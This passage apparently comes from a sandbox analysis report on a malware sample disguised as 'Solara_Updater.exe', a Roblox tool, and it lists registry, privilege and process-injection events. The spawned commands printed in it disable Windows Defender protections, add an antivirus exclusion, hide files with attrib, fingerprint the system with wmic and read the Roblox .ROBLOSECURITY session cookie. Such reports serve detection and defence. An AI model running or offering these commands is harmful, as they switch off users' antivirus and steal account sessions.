Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\hostNet\bridgeblockportComBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2692 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2692 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2692 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2692 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2692 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2692 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2692 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 4024 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4024 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4024 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 3584 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 3584 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 3584 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 3584 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 3256 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3256 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3256 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\SYSTEM32\attrib.exe
PID 3256 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\SYSTEM32\attrib.exe
PID 3256 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2916 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2916 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2916 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2916 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2916 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2916 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 4336 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4336 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4336 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 3256 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1608 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1608 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1608 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1608 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1608 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1608 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 4180 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 4180 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1416 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1416 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1416 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 3256 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3256 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 4180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 4180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 3256 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3256 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 1844 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3256 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 1844 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3256 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

